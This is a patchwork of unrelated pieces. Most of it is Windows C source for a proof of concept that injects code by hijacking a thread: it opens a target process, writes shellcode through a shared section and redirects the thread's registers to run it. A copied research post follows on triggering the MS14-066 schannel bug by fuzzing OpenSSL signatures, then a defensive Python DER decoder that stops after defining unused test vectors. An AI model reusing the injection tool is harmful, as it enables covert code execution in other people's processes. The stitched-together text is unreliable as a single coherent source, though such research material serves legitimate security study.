    NTSTATUS NTAPI NtWriteVirtualMemory(IN HANDLE ProcessHandle,IN PVOID BaseAddress,IN PVOID Buffer,IN ULONG NumberOfBytesToWrite,OUT PULONG NumberOfBytesWritten OPTIONAL);
    NTSTATUS NTAPI NtAllocateVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID *BaseAddress,IN ULONG ZeroBits,IN OUT PULONG RegionSize,IN ULONG AllocationType,IN ULONG Protect);
    NTSTATUS NTAPI NtReadVirtualMemory(IN HANDLE ProcessHandle,IN PVOID BaseAddress,OUT PVOID Buffer,IN SIZE_T NumberOfBytesToRead,OUT PSIZE_T NumberOfBytesRead OPTIONAL);
    NTSTATUS NTAPI NtFreeVirtualMemory(IN HANDLE ProcessHandle,IN PVOID *BaseAddress,IN OUT PULONG RegionSize,IN ULONG FreeType);
    NTSTATUS NTAPI NtCreateSection(OUT PHANDLE SectionHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,IN PLARGE_INTEGER MaximumSize OPTIONAL,IN ULONG SectionPageProtection OPTIONAL,IN ULONG AllocationAttributes,IN HANDLE FileHandle OPTIONAL);
    NTSTATUS NTAPI NtMapViewOfSection(IN HANDLE SectionHandle,IN HANDLE ProcessHandle,IN OUT PVOID *BaseAddress OPTIONAL,IN ULONG ZeroBits OPTIONAL,IN ULONG CommitSize,IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,IN OUT PULONG ViewSize,IN SECTION_INHERIT InheritDisposition,IN ULONG AllocationType OPTIONAL,IN ULONG Protect);
    NTSTATUS NTAPI NtOpenProcess(OUT PHANDLE ProcessHandle,IN ACCESS_MASK AccessMask,IN POBJECT_ATTRIBUTES ObjectAttributes,IN PCLIENT_ID ClientId);
    NTSTATUS NTAPI NtClose(IN HANDLE ObjectHandle);
    NTSTATUS NTAPI NtQueryInformationFile(IN HANDLE FileHandle,OUT PIO_STATUS_BLOCK IoStatusBlock,OUT PVOID FileInformation,IN ULONG Length,IN FILE_INFORMATION_CLASS FileInformationClass);
    LPVOID NTAPI RtlAllocateHeap(IN PVOID HeapHandle,IN ULONG Flags,IN ULONG Size);
    BOOLEAN NTAPI RtlFreeHeap(IN LPVOID HeapHandle,IN ULONG Flags OPTIONAL,IN PVOID HeapBase);
    LPVOID NTAPI RtlReAllocateHeap(IN PVOID HeapHandle,IN ULONG Flags,IN PVOID MemoryPointer,IN ULONG Size);
    VOID NTAPI RtlInitUnicodeString(OUT PUNICODE_STRING DestinationString,IN PCWSTR SourceString OPTIONAL);
    NTSTATUS NTAPI NtOpenSection(OUT PHANDLE SectionHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes);
    NTSTATUS NTAPI NtQueryVirtualMemory(IN HANDLE ProcessHandle,IN PVOID BaseAddress,IN MEMORY_INFORMATION_CLASS MemoryInformationClass,OUT PVOID Buffer,IN ULONG Length,OUT PULONG ResultLength OPTIONAL);
    BOOLEAN NTAPI RtlDosPathNameToNtPathName_U(IN PCWSTR DosPathName OPTIONAL,OUT PUNICODE_STRING NtPathName,OUT PCWSTR* NtFileNamePart OPTIONAL,OUT PRTL_RELATIVE_NAME_U DirectoryInfo OPTIONAL);
    NTSTATUS NTAPI NtCreateFile(OUT PHANDLE FileHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes,OUT PIO_STATUS_BLOCK IoStatusBlock,IN PLARGE_INTEGER AllocationSize OPTIONAL,IN ULONG FileAttributes,IN ULONG ShareAccess,IN ULONG CreateDisposition,IN ULONG CreateOptions,IN PVOID EaBuffer OPTIONAL,IN ULONG EaLength);
    NTSTATUS NTAPI NtReadFile(IN HANDLE FileHandle,IN HANDLE Event OPTIONAL,IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,IN PVOID ApcContext OPTIONAL,OUT PIO_STATUS_BLOCK IoStatusBlock,OUT PVOID Buffer,IN ULONG Length,IN PLARGE_INTEGER ByteOffset OPTIONAL,IN PULONG Key OPTIONAL);
    NTSTATUS NTAPI LdrGetProcedureAddress(IN HMODULE ModuleHandle,IN PANSI_STRING FunctionName OPTIONAL,IN WORD Oridinal OPTIONAL,OUT PVOID *FunctionAddress);
    NTSTATUS NTAPI NtGetContextThread(IN HANDLE ThreadHandle,OUT PCONTEXT pContext);
    NTSTATUS NTAPI NtSetContextThread(IN HANDLE ThreadHandle,IN PCONTEXT Context);
    NTSTATUS NTAPI RtlWow64GetThreadContext(IN HANDLE ThreadHandle,IN OUT PWOW64_CONTEXT ThreadContext);
    NTSTATUS NTAPI RtlWow64SetThreadContext(IN HANDLE ThreadHandle,IN PWOW64_CONTEXT ThreadContext);
    NTSTATUS NTAPI NtProtectVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID *BaseAddress,IN OUT PULONG NumberOfBytesToProtect,IN ULONG NewAccessProtection,OUT PULONG OldAccessProtection );
    NTSTATUS NTAPI NtAlertResumeThread(IN HANDLE ThreadHandle,OUT PULONG SuspendCount);
    NTSTATUS NTAPI NtOpenThreadToken(IN HANDLE ThreadHandle,IN ACCESS_MASK DesiredAccess,IN BOOLEAN OpenAsSelf,OUT PHANDLE TokenHandle);
    NTSTATUS NTAPI NtSetInformationThread(IN HANDLE ThreadHandle,IN THREAD_INFORMATION_CLASS ThreadInformationClass,IN PVOID ThreadInformation,IN ULONG ThreadInformationLength);
    NTSTATUS NTAPI NtOpenDirectoryObject(OUT PHANDLE DirectoryObjectHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes);
    NTSTATUS NTAPI NtCreateMutant(OUT PHANDLE MutantHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,IN BOOLEAN InitialOwner);
};

NTSTATUS TCHInjection(IN DWORD PID);

inject.cpp:

#include "inject.h"

ULONG FindPattern(LPVOID Memory,SIZE_T MemorySize,LPVOID Pattern,SIZE_T PatternSize)
{
    for(SIZE_T x = 0; (x + PatternSize) < MemorySize; x++)
    {
        if(memcmp(&((LPBYTE)Memory)[x],Pattern,PatternSize) == 0)
        {
            return x;
        }
    }
    return 0xFFFFFFFF;
}

NTSTATUS GetTIDFromPID(IN DWORD PID,OUT PDWORD TID)
{
    NTSTATUS NtStatus;
    LPVOID Buffer;
    ULONG Size;
    PSYSTEM_PROCESS_INFORMATION ProcessInfo;
    ULONG NextEntryOffset;

    Size = 0x10000;
    Buffer = HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,Size);
    while(TRUE)
    {
        NtStatus = NtQuerySystemInformation(SystemProcessInformation,Buffer,Size,&Size);
        if(NT_SUCCESS(NtStatus))
        {
            break;
        }
        else if(NtStatus == STATUS_INFO_LENGTH_MISMATCH)
        {
            Size += 0x10000;
            Buffer = HeapReAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,Buffer,Size);
        }
        else
        {
            printf("NtQuerySystemInformation error: %X\n",NtStatus);
            goto Finish_;
        }
    }
    NextEntryOffset = 0;
    NtStatus = STATUS_NOT_FOUND;
    ProcessInfo = (PSYSTEM_PROCESS_INFORMATION)Buffer;
    do
    {
        ProcessInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONG_PTR)ProcessInfo + NextEntryOffset);
        if(ProcessInfo->ProcessId == (HANDLE)PID)
        {
            if(ProcessInfo->NumberOfThreads > 0)
            {
                *TID = (DWORD)ProcessInfo->Threads[0].ClientId.UniqueThread;
                NtStatus = STATUS_SUCCESS;
                break;
            }
        }
        NextEntryOffset = ProcessInfo->NextEntryOffset;
    }while(NextEntryOffset > 0);
Finish_:
    HeapFree(GetProcessHeap(),0,Buffer);
    return NtStatus;
}

NTSTATUS RemoteEnumModules(IN HANDLE hProcess,OUT LPVOID** lpModules,OUT PULONG NumModules)
{
    NTSTATUS NtStatus;
    PROCESS_BASIC_INFORMATION ProcBasicInfo;
    PPEB_LDR_DATA LdrData;
    PLIST_ENTRY ListHeadPtr;
    PLIST_ENTRY ListEntryPtr;
    LDR_DATA_TABLE_ENTRY ModuleEntry;
    LPVOID* ModBaseAddress;
    ULONG NumOfModules;
    ULONG HpMemSize;

    if( (!lpModules) || (!NumModules))
    {
        return STATUS_INVALID_PARAMETER;
    }
    NtStatus = NtQueryInformationProcess(hProcess,ProcessBasicInformation,&ProcBasicInfo,sizeof(ProcBasicInfo),NULL);
    if(!NT_SUCCESS(NtStatus))
    {
        return NtStatus;
    }
    NtStatus = NtReadVirtualMemory(hProcess,&((PPEB)ProcBasicInfo.PebBaseAddress)->Ldr,&LdrData,sizeof(LdrData),NULL);
    if(!NT_SUCCESS(NtStatus))
    {
        return NtStatus;
    }
    ListHeadPtr = &LdrData->InLoadOrderModuleList;
    NtStatus = NtReadVirtualMemory(hProcess,&LdrData->InLoadOrderModuleList.Flink,&ListEntryPtr,sizeof(ListEntryPtr),NULL);
    if(!NT_SUCCESS(NtStatus))
    {
        return NtStatus;
    }
    NumOfModules = 0;
    HpMemSize = sizeof(LPVOID) * 100;
    ModBaseAddress = (LPVOID*)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,HpMemSize);
    NtStatus = STATUS_SUCCESS;
    while (ListEntryPtr != ListHeadPtr)
    {
        NtStatus = NtReadVirtualMemory(hProcess,ListEntryPtr,&ModuleEntry,sizeof(ModuleEntry),NULL);
        if(!NT_SUCCESS(NtStatus))
        {
            HeapFree(GetProcessHeap(),0,ModBaseAddress);
            return NtStatus;
        }
        if(ModuleEntry.DllBase)
        {
            if((NumOfModules + 1) * sizeof(LPVOID) >= HpMemSize)
            {
                HpMemSize += sizeof(LPVOID) * 100;
                ModBaseAddress = (LPVOID*)HeapReAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,ModBaseAddress,HpMemSize);
            }
            ModBaseAddress[NumOfModules] = ModuleEntry.DllBase;
            NumOfModules++;
        }
        ListEntryPtr = ModuleEntry.InLoadOrderLinks.Flink;
    }
    *lpModules = ModBaseAddress;
    *NumModules = NumOfModules;
    return NtStatus;
}

NTSTATUS GetInstructionsAddr(IN HANDLE hProcess,OUT PREMOTE_CODE_STRUCTURE pStruct,LPVOID *EsiField)
{
    typedef struct _RM_CODE
    {
        LPBYTE Ptr;
        ULONG NumBytes;
        LPVOID* SavePtr;
    }RM_CODE,*PRM_CODE;

    NTSTATUS NtStatus;
    HANDLE hCurrentProcess;
    LPVOID* ModulesArr;
    ULONG NumModules;
    BYTE ModuleHeaders[0x800];
    RM_CODE RMCodes[] = {
        {(LPBYTE)RmCode0,sizeof(RmCode0),&pStruct->RetRmCode0},
        {(LPBYTE)RmCode1,sizeof(RmCode1),&pStruct->RetRmCode1},
        {(LPBYTE)RmCodeEsi,sizeof(RmCodeEsi),EsiField},
        {(LPBYTE)RmCode2,sizeof(RmCode2),&pStruct->RetRmCode2},
        {(LPBYTE)RmCode3,sizeof(RmCode3),&pStruct->RetRmCode3},
        {(LPBYTE)RmCodeEsi2,sizeof(RmCodeEsi2),&pStruct->PopEsi},
        {(LPBYTE)RMCodeEcx,sizeof(RMCodeEcx),&pStruct->PopEcx}};

    if(!pStruct)
    {
        return STATUS_INVALID_PARAMETER;
    }
    NtStatus = RemoteEnumModules(hProcess,&ModulesArr,&NumModules);
    if(!NT_SUCCESS(NtStatus))
    {
        return NtStatus;
    }
    hCurrentProcess = GetCurrentProcess();
    for(LONG c = 0; c < sizeof(RMCodes) / sizeof(RMCodes[0]); c++)
    {
        NTSTATUS RMCodeFound;
        RMCodeFound = STATUS_NOT_FOUND;
        for(ULONG m = 0; m < NumModules; m++)
        {
            NtStatus = NtReadVirtualMemory( hProcess, ModulesArr[m], ModuleHeaders, sizeof(ModuleHeaders), NULL);
            if(!NT_SUCCESS(NtStatus))
            {
                continue;
            }
            PIMAGE_DOS_HEADER DOSHeader;
            PIMAGE_NT_HEADERS NTHeader;
            PIMAGE_SECTION_HEADER SectionHeader;
            LPVOID PESectionBaseAddress;
            LPVOID
PESection; ULONG PESectionSize; MEMORY_BASIC_INFORMATION MemBasicInfo; ULONG PatternOff; DOSHeader = (PIMAGE_DOS_HEADER)ModuleHeaders; NTHeader = (PIMAGE_NT_HEADERS)((ULONG_PTR)DOSHeader + DOSHeader->e_lfanew); SectionHeader = IMAGE_FIRST_SECTION(NTHeader); if((DOSHeader->e_magic == IMAGE_DOS_SIGNATURE) && (NTHeader->Signature == IMAGE_NT_SIGNATURE) && (NTHeader->OptionalHeader.SizeOfHeaders <= sizeof(ModuleHeaders))) { for(ULONG s = 0; s < NTHeader->FileHeader.NumberOfSections; s++) { PESection = NULL; PESectionSize = SectionHeader[s].Misc.VirtualSize; PESectionBaseAddress = PTR_ADD_OFFSET(ModulesArr[m],SectionHeader[s].VirtualAddress); NtStatus = NtQueryVirtualMemory( hProcess, PESectionBaseAddress, MemoryBasicInformation, &MemBasicInfo, sizeof(MEMORY_BASIC_INFORMATION), NULL); if(!NT_SUCCESS(NtStatus)) { continue; } if(!(MemBasicInfo.Protect & PAGE_EXECUTE_READ)) { continue; } NtStatus = NtAllocateVirtualMemory( hCurrentProcess, &PESection, 0, &PESectionSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if(!NT_SUCCESS(NtStatus)) { continue; } /* Read section */ NtStatus = NtReadVirtualMemory( hProcess, PESectionBaseAddress, PESection, PESectionSize, NULL); if(!NT_SUCCESS(NtStatus)) { goto fmem; } PatternOff = FindPattern( PESection, PESectionSize, RMCodes[c].Ptr, RMCodes[c].NumBytes); if(PatternOff != 0xFFFFFFFF) { NtFreeVirtualMemory( hCurrentProcess, &PESection, &PESectionSize, MEM_RELEASE); *RMCodes[c].SavePtr = PTR_ADD_OFFSET(PESectionBaseAddress,PatternOff); RMCodeFound = STATUS_SUCCESS; goto val_result; } fmem: NtFreeVirtualMemory( hCurrentProcess, &PESection, &PESectionSize, MEM_RELEASE); } } } val_result: if(!NT_SUCCESS(RMCodeFound)) { NtStatus = RMCodeFound; break; } } HeapFree(GetProcessHeap(),0,ModulesArr); return NtStatus; } hSection: Pointer to a variable that receives a handle of the shared section BaseOfView: Pointer to a variable that receives a pointer to the base address of map view SizeOfView: Pointer to a variable that receives the size of view 
in bytes RemoteAddrOfBeginMark: Pointer to a variable that receives the address of the beginning of the mark in the remote process If the function succeeds, the return value is STATUS_SUCCESS otherwise any NTSTATUS value ------------------------------------------------------------------------------------------------------ This loop walk on the array of names of shared sections, attempts to map the section, check the size page in order to know if there is enough space to write our bytes then looks for a sequence of bytes that have been written in the section in order to know if that section is mapped into the process (alternatively you can list handles of the target process and look for any shared sections) . In other words this function validates the environment of the target process so we can know if possible to continue with our */ NTSTATUS GetSharedSection(HANDLE hTargetProcess,OUT HANDLE* hSection,OUT LPVOID* BaseOfView,OUT PULONG SizeOfView,OUT LPVOID* RemoteAddrOfBeginMark) { NTSTATUS NtStatus; HANDLE hCurrentProcess; LPVOID AllocatedBuffer; ULONG AllocatedSize; UNICODE_STRING SectionName; OBJECT_ATTRIBUTES ObjAttr; HANDLE SectionHandle; LPVOID BaseAddress; ULONG Size; MEMORY_BASIC_INFORMATION MemBasicInfo; LPVOID QueryBaseAddress; LPVOID BeginMark; ULONG BeginMarkOff; if( (!hSection) || (!BaseOfView) || (!SizeOfView) || (!RemoteAddrOfBeginMark)) { return STATUS_INVALID_PARAMETER; } hCurrentProcess = GetCurrentProcess(); AllocatedBuffer = NULL; AllocatedSize = 0x10000; // 64KB if(!NT_SUCCESS(NtStatus = NtAllocateVirtualMemory( hCurrentProcess, &AllocatedBuffer, 0, &AllocatedSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE))) { return NtStatus; } for(ULONG s = 0; s < sizeof(SharedSections) / sizeof(SharedSections[0]); s++) { RtlInitUnicodeString(&SectionName,SharedSections[s]); InitializeObjectAttributes(&ObjAttr,&SectionName,0,NULL,NULL); NtStatus = NtOpenSection(&SectionHandle,SECTION_MAP_WRITE | SECTION_MAP_READ,&ObjAttr); if(NT_SUCCESS(NtStatus)) { 
BaseAddress = NULL; Size = 0; NtStatus = NtMapViewOfSection( SectionHandle, hCurrentProcess, &BaseAddress, 0, 0, NULL, &Size, ViewUnmap, 0, PAGE_READWRITE); if(NT_SUCCESS(NtStatus) || NtStatus == STATUS_IMAGE_NOT_AT_BASE) { NtStatus = NtQueryVirtualMemory( hCurrentProcess, BaseAddress, MemoryBasicInformation, &MemBasicInfo, sizeof(MEMORY_BASIC_INFORMATION), NULL); if(NT_SUCCESS(NtStatus)) { if(sizeof(REMOTE_CODE_STRUCTURE) <= MemBasicInfo.RegionSize) { RtlCopyMemory( PTR_SUB_OFFSET(PTR_ADD_OFFSET(BaseAddress,MemBasicInfo.RegionSize),sizeof(REMOTE_CODE_STRUCTURE)), BegMark, sizeof(BegMark)); QueryBaseAddress = 0; while(NT_SUCCESS(NtQueryVirtualMemory( hTargetProcess, QueryBaseAddress, MemoryBasicInformation, &MemBasicInfo, sizeof(MEMORY_BASIC_INFORMATION), NULL))) { if(MemBasicInfo.Type & MEM_MAPPED) { ULONG IndReadBytes; ULONG NumOfBytes; ULONG ReadB; IndReadBytes = 0; while(IndReadBytes < MemBasicInfo.RegionSize) { ULONG Remaining = MemBasicInfo.RegionSize - IndReadBytes; NumOfBytes = Remaining < AllocatedSize ? 
Remaining : AllocatedSize; if(!NT_SUCCESS(NtReadVirtualMemory( hTargetProcess, QueryBaseAddress, AllocatedBuffer, NumOfBytes, &ReadB))) { break; } BeginMarkOff = FindPattern( AllocatedBuffer, NumOfBytes, (LPVOID)BegMark, sizeof(BegMark)); if(BeginMarkOff != 0xFFFFFFFF) { BeginMark = PTR_ADD_OFFSET(PTR_ADD_OFFSET(QueryBaseAddress,IndReadBytes),BeginMarkOff); *hSection = SectionHandle; *BaseOfView = BaseAddress; *SizeOfView = Size; *RemoteAddrOfBeginMark = BeginMark; NtStatus = STATUS_SUCCESS; goto Finish_; } IndReadBytes += NumOfBytes; } } QueryBaseAddress = PTR_ADD_OFFSET(QueryBaseAddress,MemBasicInfo.RegionSize); } } } NtUnmapViewOfSection(hCurrentProcess,BaseAddress); } NtClose(SectionHandle); } } Finish_: NtFreeVirtualMemory(hCurrentProcess,&AllocatedBuffer,&AllocatedSize,MEM_RELEASE); return NtStatus; } NTSTATUS TCHInjection(IN DWORD PID) { NTSTATUS NtStatus; OBJECT_ATTRIBUTES ObjAttributes; CLIENT_ID ClientId; HANDLE hProcess; HANDLE hSection; LPVOID SectionBaseOfView; ULONG SectionSizeOfView; LPVOID RemtBeginMark; DWORD ThreadId; HANDLE hThread; ULONG SuspendCount; CONTEXT ThreadContext; REMOTE_CODE_STRUCTURE RemoteCodeStruct; LPVOID rEsi; ClientId.UniqueProcess = (PVOID)PID; ClientId.UniqueThread = NULL; InitializeObjectAttributes(&ObjAttributes,NULL,0,NULL,NULL); NtStatus = NtOpenProcess( &hProcess, PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ, &ObjAttributes, &ClientId); if(!NT_SUCCESS(NtStatus)) { printf("Unable to get a handle to the target process: %X\n",NtStatus); return NtStatus; } NtStatus = GetSharedSection( hProcess, &hSection, &SectionBaseOfView, &SectionSizeOfView, &RemtBeginMark); if(!NT_SUCCESS(NtStatus)) { printf("Unable to get a valid shared section: %X\n",NtStatus); goto Finish_; } NtStatus = GetInstructionsAddr(hProcess,&RemoteCodeStruct,&rEsi); if(!NT_SUCCESS(NtStatus)) { goto Finish_chsc; } RtlCopyMemory(RemoteCodeStruct.BeginningMark,BegMark,sizeof(BegMark)); 
RtlCopyMemory(RemoteCodeStruct.Shellcode,Code,sizeof(Code)); RtlCopyMemory(RemoteCodeStruct.TittleMsgBox,MsgTittle,sizeof(MsgTittle)); RemoteCodeStruct.CreateThread = GetProcAddress(GetModuleHandleW(TEXT("kernel32")),"CreateThread"); RemoteCodeStruct.MessageBoxW = GetProcAddress(LoadLibraryW(TEXT("user32")),"MessageBoxW"); RemoteCodeStruct.lpAddress = NULL; RemoteCodeStruct.dwSize = sizeof(Code); RemoteCodeStruct.flAllocationType = MEM_COMMIT | MEM_RESERVE; RemoteCodeStruct.flProtect = PAGE_EXECUTE_READWRITE; RemoteCodeStruct.src = PTR_ADD_OFFSET(RemtBeginMark,FIELD_OFFSET(REMOTE_CODE_STRUCTURE,Shellcode)); RemoteCodeStruct.count = sizeof(Code); NtStatus = GetTIDFromPID(PID,&ThreadId); if(!NT_SUCCESS(NtStatus)) { goto Finish_chsc; } ClientId.UniqueProcess = NULL; ClientId.UniqueThread = (PVOID)ThreadId; InitializeObjectAttributes(&ObjAttributes,NULL,NULL,0,NULL); NtStatus = NtOpenThread( &hThread, THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME | THREAD_QUERY_INFORMATION, &ObjAttributes, &ClientId); if(!NT_SUCCESS(NtStatus)) { goto Finish_chsc; } NtStatus = NtSuspendThread(hThread,&SuspendCount); if(!NT_SUCCESS(NtStatus)) { goto Finish_chtd; } /* Resume thread as soon as possible */ RtlZeroMemory(&ThreadContext,sizeof(CONTEXT)); ThreadContext.ContextFlags = CONTEXT_CONTROL | CONTEXT_INTEGER; NtStatus = NtGetContextThread(hThread,&ThreadContext); if(!NT_SUCCESS(NtStatus)) { NtResumeThread(hThread,&SuspendCount); goto Finish_chtd; } RemoteCodeStruct.tc_Eip = ThreadContext.Eip; RemoteCodeStruct._Flags = ThreadContext.EFlags; RemoteCodeStruct._Eax = ThreadContext.Eax; RemoteCodeStruct._Ecx = ThreadContext.Ecx; RemoteCodeStruct._Edx = ThreadContext.Edx; RemoteCodeStruct._Ebx = ThreadContext.Ebx; RemoteCodeStruct._Ebp = ThreadContext.Ebp; RemoteCodeStruct._Esi = ThreadContext.Esi; RemoteCodeStruct._Edi = ThreadContext.Edi; RemoteCodeStruct._Esp = ThreadContext.Esp; RtlCopyMemory(SectionBaseOfView,&RemoteCodeStruct,sizeof(REMOTE_CODE_STRUCTURE)); 
ThreadContext.Ebp = (DWORD)RemtBeginMark; ThreadContext.Eip = (DWORD)GetProcAddress(GetModuleHandleW(TEXT("kernel32")),"VirtualAlloc"); ThreadContext.Esp = (DWORD)PTR_ADD_OFFSET(RemtBeginMark,FIELD_OFFSET(REMOTE_CODE_STRUCTURE,RetRmCode0)); ThreadContext.Esi = (DWORD)rEsi; ThreadContext.Edi = (DWORD)GetProcAddress(GetModuleHandleW(TEXT("ntdll")),"memcpy"); NtStatus = NtSetContextThread(hThread,&ThreadContext); if(!NT_SUCCESS(NtStatus)) { NtResumeThread(hThread,&SuspendCount); goto Finish_chtd; } NtStatus = NtResumeThread(hThread,&SuspendCount); if(!NT_SUCCESS(NtStatus)) { goto Finish_chtd; } printf("Injection succeeded \n"); NtStatus = STATUS_SUCCESS; Finish_chtd: NtClose(hThread); Finish_chsc: NtUnmapViewOfSection(GetCurrentProcess(),SectionBaseOfView); NtClose(hSection); Finish_: NtClose(hProcess); return NtStatus; } Source: KernelMode.info • View topic - PoC: Code injection via thread hijacking
-
Triggering MS14-066
Posted November 17, 2014, Research Team

Microsoft addressed CVE-2014-6321 this Patch Tuesday, which has been hyped as the next Heartbleed. This vulnerability (actually at least 2 vulnerabilities) promises remote code execution in applications that use the SChannel Security Service Provider, such as Microsoft Internet Information Services (IIS). The details have been scarce. Let's fix that.

Looking at the bindiff of schannel.dll, we see a few changed functions, several touching the DTLSCookieManager class and various others. There is at least one bug addressed in DTLSCookieManager, but that one is for a different time. The one everyone is worried about seems to be in schannel!DecodeSigAndReverse(…). A high-level view of the changes to DecodeSigAndReverse(…) is presented below. Here we can see that there is some new logic (grey blocks) added to the middle of the patched function (right side). Added branches are always a good sign. If we zoom in on the patched version, the situation looks even more promising. We can now see that the added logic controls a path to a memcpy (actually two memcpys; they wouldn't both fit in the screenshot). This is an indication that we are looking in the right place.

So how do we get here? Let's look at the paths to this function in the unpatched version of schannel.dll. It appears as though we need to hit 'ProcessHandshake' and then craft a 'ClientVerifyMessage' in order to hit the changed code. To accomplish this, we should probably check out the TLS/SSL documentation at MSDN. Given the names of the functions in the code path, it would make sense that we are dealing with a Certificate Verify message, which is involved in certificate authentication. If we take a closer look at the unpatched function, we can get a key clue from the lpszStructType parameter in the call to CryptDecodeObject. With a quick trip to MSDN, we can see that this parameter is telling us what kind of structure to expect.
In this case we have X509_ECC_SIGNATURE and X509_DSS_SIGNATURE. Picking on the ECC_SIGNATURE, the expected structure is defined on MSDN. It appears as though there could be an issue with the size parameter to one of the memcpys, probably related to encoding the certificate. At this point, with what we know, the fastest way for us to proceed is to look at this function dynamically (with a debugger). So, we created an ECDSA-signed certificate with OpenSSL and set up Microsoft IIS with certificate authentication enabled. We then attached a remote debugger to the LSASS process on the IIS box and set a breakpoint on the ECC_SIGNATURE comparison (cmp ebx, 2F). Surprisingly, the breakpoint fired on the first try when attempting to authenticate using openssl s_client! Now that we can hit the bad code, the next step is making something cool happen here. Again, to speed up analysis, we decided to modify OpenSSL to fuzz this code path. In OpenSSL, ECDSA signatures for 'client verify messages' are handled in the source file s3_clnt.c. The encoded signatures from the client which end up hitting the CryptDecodeObject(…) call in schannel!DecodeSigAndReverse(…) come from a function called ECDSA_sign(…).
If we wander down the function ssl3_send_client_verify(…), which eventually calls ECDSA_sign(…), we get to the block which actually handles the ECDSA signing for our client verify message. To clarify this call, the function prototype for ECDSA_sign is as follows:

int ECDSA_sign(int type, const unsigned char *dgst, int dgstlen, unsigned char *sig, unsigned int *siglen, EC_KEY *eckey);

Reading the documentation for that function we learn that "…The DER encoded signatures is stored in sig and it's length is returned in sig_len." Therefore, if we were to use openssl s_client to authenticate to our IIS box and then single-step through schannel!DecodeSigAndReverse(…), we would see the contents of 'p' from the above call to ECDSA_sign(…) being handed to CryptDecodeObject(…) in schannel, which would then be translated and handed off to our bad memcpy block. So, all we really need to do is edit s3_clnt.c to change one byte in 'p' to a random value before sending our Certificate Verify message to IIS, over and over again, and wait until something cool happens. And if we wait long enough, it will: we will get a crash in memcpy. Further analysis and exploitation are left as an exercise to the reader.

Source: Triggering MS14-066 | BeyondTrust
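The memcpy-size problem the post circles around is exactly what a strict decoder of the DER-encoded ECDSA signature (SEQUENCE { INTEGER r, INTEGER s }) has to rule out before any copy happens. The Python below is an added example, not code from the BeyondTrust post, from OpenSSL or from schannel: it decodes such a signature with minimal-DER and bounds checks, and only after those checks reverses r and s into fixed-size little-endian buffers of the curve's coordinate length (the "decode and reverse" step). The three test vectors and the coord_len parameter are constructed for the example and are not real signatures.

```python
# Added example: strict DER decoding of SEQUENCE { INTEGER r, INTEGER s } with
# every length checked against the fixed output buffer *before* copying.


class SignatureFormatError(ValueError):
    """Raised for any signature that must never reach the copy stage."""


def _read_tlv(buf, pos, expected_tag):
    """Parse one DER tag-length-value at buf[pos:]; return (value, next_pos)."""
    if pos + 2 > len(buf):
        raise SignatureFormatError("truncated before tag/length")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if tag != expected_tag:
        raise SignatureFormatError("unexpected tag 0x%02x" % tag)
    if first < 0x80:                      # short form
        length = first
    elif first == 0x81:                   # one length byte, must be >= 0x80
        if pos + 1 > len(buf):
            raise SignatureFormatError("truncated length")
        length = buf[pos]
        pos += 1
        if length < 0x80:
            raise SignatureFormatError("non-minimal DER length")
    elif first == 0x82:                   # two length bytes, must be >= 0x100
        if pos + 2 > len(buf):
            raise SignatureFormatError("truncated length")
        length = (buf[pos] << 8) | buf[pos + 1]
        pos += 2
        if length < 0x100:
            raise SignatureFormatError("non-minimal DER length")
    else:
        raise SignatureFormatError("length form too long for a signature")
    if pos + length > len(buf):
        raise SignatureFormatError("value runs past end of buffer")
    return buf[pos:pos + length], pos + length


def _unsigned_integer(raw, coord_len):
    """Validate a DER INTEGER body and return its magnitude, at most coord_len bytes."""
    if not raw:
        raise SignatureFormatError("empty INTEGER")
    if raw[0] & 0x80:
        raise SignatureFormatError("negative INTEGER")
    if len(raw) > 1 and raw[0] == 0 and not (raw[1] & 0x80):
        raise SignatureFormatError("non-minimal INTEGER encoding")
    if raw[0] == 0:
        raw = raw[1:]                     # drop the sign byte that keeps the value positive
    if len(raw) > coord_len:
        # The check that bounds the copy: an attacker-supplied INTEGER longer than
        # the curve's coordinate size must never be copied into a fixed buffer.
        raise SignatureFormatError(
            "INTEGER of %d bytes exceeds coordinate size %d" % (len(raw), coord_len))
    return raw


def _reverse_into_fixed_buffer(value, coord_len):
    """Copy value into a zeroed coord_len-byte buffer as little-endian (length already checked)."""
    out = bytearray(coord_len)
    out[:len(value)] = value[::-1]
    return bytes(out)


def decode_ecdsa_signature(sig, coord_len):
    """Return {'accepted': True, 'r_le': hex, 's_le': hex} or {'accepted': False, 'reason': ...}."""
    try:
        body, end = _read_tlv(sig, 0, 0x30)
        if end != len(sig):
            raise SignatureFormatError("trailing bytes after SEQUENCE")
        r_raw, pos = _read_tlv(body, 0, 0x02)
        s_raw, pos = _read_tlv(body, pos, 0x02)
        if pos != len(body):
            raise SignatureFormatError("trailing bytes inside SEQUENCE")
        r = _unsigned_integer(r_raw, coord_len)
        s = _unsigned_integer(s_raw, coord_len)
    except SignatureFormatError as exc:
        return {"accepted": False, "reason": str(exc)}
    return {
        "accepted": True,
        "r_le": _reverse_into_fixed_buffer(r, coord_len).hex(),
        "s_le": _reverse_into_fixed_buffer(s, coord_len).hex(),
    }


# Constructed test vectors for a P-256-sized signature (coord_len = 32); not real signatures.
R_VALUE = bytes([0x7F]) + b"\x11" * 31        # top bit clear: no leading 0x00 needed
S_VALUE = bytes([0x80]) + b"\x22" * 31        # top bit set: DER needs a leading 0x00
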